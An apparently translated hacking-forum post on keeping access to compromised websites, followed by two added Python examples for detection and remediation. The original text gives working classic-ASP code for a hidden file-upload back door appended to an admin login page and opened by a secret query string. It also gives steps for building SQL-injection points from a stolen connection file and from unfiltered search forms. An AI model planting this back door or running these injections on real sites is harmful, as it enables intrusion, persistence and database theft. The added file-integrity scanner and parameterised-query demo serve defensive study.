Leaving a back door on a website - vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200925166
Type myhack58
Reporter Anonymous
Modified 2009-11-01T00:00:00



Hiding our back door in the administrator's back-end login page is relatively safe, because the administrator's entry page is not often replaced; as long as he keeps logging in through that page, our back door stays in place. Of course, it can just as well be inserted into another file, as long as that file is not one that gets replaced regularly.

  1. From our shell, find the administrator login page.
  2. Edit it and append the following code at the very end:

     <%if request.QueryString("action")="comeon" then a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form><%end if%>

  3. So how do we get back to our back door? On the surface there is nothing to tell it apart from the original page; that is the whole secret of where we hid it. Request login.asp?action=comeon and our upload page appears!
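A defender's counterpart to the trick above, as an added example that is not part of the original page: a small Python script that keeps a SHA-256 baseline of the site's ASP files and scans any file that has changed for the features that give this kind of dropper away (a query-string trigger, Request.BinaryRead fed into an ADODB.Stream, SaveToFile under Server.MapPath, and an upload form sitting in a login page). The sample pages, the paths and the trigger value "xyz" are constructed for the example; the infected sample is a deliberately incomplete sketch used only as scanner input.

```python
import hashlib
import re

# Constructed sample of a clean admin login page (not from any real site).
CLEAN_LOGIN_ASP = """<%
if Request.Form("user") <> "" then
    ' authenticate against the admin table here
end if
%>
<form method="post"><input name="user"><input name="pass" type="password"></form>
"""

# The same page with a dropper of the kind described above appended to it.
# Constructed, deliberately incomplete sketch used only as scanner input;
# "xyz" stands in for whatever trigger value was chosen.
INFECTED_LOGIN_ASP = CLEAN_LOGIN_ASP + """<%if Request.QueryString("action")="xyz" then
a=Request.TotalBytes:b="adodb.stream":Set c=CreateObject(b):c.Write Request.BinaryRead(a)
c.SaveToFile Server.MapPath(j),2%>
<form enctype=multipart/form-data method=post><input type=file name=n></form><%end if%>
"""

# Features that give the dropper away. Whitespace-tolerant because this code is
# usually typed on one line and often extracted with stray spaces; case-insensitive
# because VBScript is.
INDICATORS = {
    "querystring_trigger": re.compile(r'Request\s*\.\s*QueryString\s*\(\s*"[^"]+"\s*\)\s*=\s*"', re.I),
    "raw_body_read": re.compile(r'Request\s*\.\s*BinaryRead\s*\(', re.I),
    "binary_stream": re.compile(r'adodb\s*\.\s*stream', re.I),
    "write_to_disk": re.compile(r'\.\s*SaveToFile\s+Server\s*\.\s*MapPath', re.I),
    "upload_form_in_login": re.compile(r'enctype\s*=\s*"?multipart/form-data', re.I),
}


def scan_asp_source(text: str) -> list[str]:
    """Names of the indicators present in one ASP source file."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(text: str) -> bool:
    # Reading the raw request body and writing a file from the same page is the
    # essence of a dropper; three or more indicators together is also enough.
    hits = set(scan_asp_source(text))
    return {"raw_body_read", "write_to_disk"} <= hits or len(hits) >= 3


def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files: dict[str, str]) -> dict[str, str]:
    """Map path -> SHA-256 for a known-good copy of the site's ASP files."""
    return {path: sha256_text(content) for path, content in files.items()}


def changed_files(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Paths that are new or whose content no longer matches the baseline."""
    return sorted(p for p, c in current.items() if baseline.get(p) != sha256_text(c))


def audit(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """For every changed file, the indicators found in it (empty list: changed but clean)."""
    return {p: scan_asp_source(current[p]) for p in changed_files(baseline, current)}


if __name__ == "__main__":
    good = {"admin/login.asp": CLEAN_LOGIN_ASP, "index.asp": "<%= Now() %>"}
    now = {"admin/login.asp": INFECTED_LOGIN_ASP, "index.asp": "<%= Now() %>"}
    for path, hits in audit(build_baseline(good), now).items():
        print(path, "changed; indicators:", hits or "none")
```

The baseline is the important half: the page's point is that a login page is rarely edited, which is exactly why a hash that changes without a deployment is worth an alert even when no signature fires. Run the scan over every changed file rather than only the login page, since the text says the same code can be dropped into any rarely replaced file.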

Second, a more extreme one.

Constructing your own injection point

Once the database account and password are known from conn.asp, there are two ways forward: construct the injection point yourself, or view the source code of the search page and construct the injection point from it.

This splits into several cases, each with its own method.

Class A: an MDB database. Very simple: just download it and you are done.

Class B: MSSQL database. We have obtained the site's database connection file, but not SA permissions.

Because the target site has no injection vulnerability and so cannot be injected directly, we can instead build a file locally that contains an injection point and then let NBSI scan it, which yields a great deal more information from the database.

Construction method: first set up an ASP environment locally, then create the following file:

    <!--#include file="conn.asp" -->
    <%
    dim rs,strSQL,id
    set rs=server.createobject("ADODB.recordset")
    id = request("id")
    strSQL = "select * from admin where id=" & id 'if this table does not exist, you can create a table and field
    rs.open strSQL,conn,1,3
    rs.close
    %>

Note: the "admin" table must exist, so the file must begin with the database connection include!! Done, it is that simple; everything else the database will expose on its own. Open NBSI, inject away, and all the information comes out.

Second, constructing the injection point through search. The search page is search.asp, as the name suggests. The main thing to test is the input box:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: '%'
    /search.asp, line 54

An error, so it seems nothing is filtered; next we construct the injection point. Pay attention to the procedure: view the page source:

    <form method=post action="search.asp">

This is a form submitting by the POST method to search.asp, and the content we enter goes into this input:

    <input type="text" size="12"

We construct a link that passes the parameter directly in the URL to the search.asp file. "Sorry, did not search to the relevant information!" means it searched for the keyword test, which was our input; the input box is not filtered, so this is where the injection lives. I check this link: the error message shows that we have constructed an injection point. Put it into NBSI and run it, and that is all.

Class C: MSSQL database. We have obtained the site's database connection file, with DB_OWNER permissions. What then? Differential backup and the like, which I will not demonstrate; here the focus is search-type injection. To make it easier to follow, I repeated the operation on two sites, status unknown. The single quote is not filtered, so we look directly at the input in the source code to construct the injection point.

    <form method="post" action="/search_all.asp">

It is submitted to this file.

    <input type="text" size="14"

This is the field.

    <>

After constructing the injection point, run it with NBSI. The rest is not demonstrated. I also want to pass on an idea: the input boxes of many admin back-end login pages are likewise unfiltered. Sometimes you have to hunt for the back-end password in order to log in, but sometimes an injection point can be constructed from the login box instead; if it runs as sa, why bother logging into the back end at all?
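The injection points in Class B and Class C share one root cause: the request value (the id in "select * from admin where id=" & id, or the keyword in the search forms) is spliced into the SQL text. The following Python example, added here and not from the original page, reproduces both patterns against an in-memory SQLite database beside their parameterised fixes, so the same inputs can be compared side by side; the tables and rows are constructed for the example. In classic ASP the equivalent fix is an ADODB.Command whose parameters are created with CreateParameter instead of string concatenation.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: an admin table like the page's, plus a searchable table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer primary key, username text, password text)")
    conn.executemany("insert into admin values (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "editor", "pass2")])
    conn.execute("create table article (id integer primary key, title text)")
    conn.executemany("insert into article (title) values (?)",
                     [("test page",), ("another test",), ("unrelated",)])
    conn.commit()
    return conn


def lookup_admin_vulnerable(conn: sqlite3.Connection, id_value: str) -> list:
    # Same shape as the page's strSQL = "select * from admin where id=" & id:
    # the raw request value becomes part of the statement text.
    return conn.execute("select * from admin where id=" + id_value).fetchall()


def lookup_admin_safe(conn: sqlite3.Connection, id_value: str) -> list:
    # Bound parameter: the value travels separately from the SQL and is compared
    # as data, so it can never change the statement's structure.
    return conn.execute("select * from admin where id=?", (id_value,)).fetchall()


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # Search-type injection: the keyword is spliced into a LIKE pattern.
    sql = "select title from article where title like '%" + term + "%' order by id"
    return [row[0] for row in conn.execute(sql).fetchall()]


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Bind the whole pattern and escape LIKE wildcards so the caller cannot widen
    # the match with % or _ either.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "select title from article where title like ? escape '\\' order by id"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",)).fetchall()]


def errors_on(func, conn: sqlite3.Connection, value: str) -> bool:
    """True if the query raises a database error for this input: the tell the page
    relies on (the ODBC '80040e14' message) when a quote reaches the SQL text."""
    try:
        func(conn, value)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1:", lookup_admin_vulnerable(db, "1"))
    print("vulnerable, id=0 or 1=1:", lookup_admin_vulnerable(db, "0 or 1=1"))
    print("safe, id=0 or 1=1:", lookup_admin_safe(db, "0 or 1=1"))
    print("search for a quote errors (vulnerable):", errors_on(search_vulnerable, db, "'"))
    print("search for a quote errors (safe):", errors_on(search_safe, db, "'"))
```

The safe variants never raise a syntax error on a stray quote and never return extra rows for "0 or 1=1" or "%", which is also why the page's detection method (an ODBC error after typing a quote into the box) goes quiet on a parameterised page: the error message is the symptom, and binding the value removes the cause rather than hiding the message.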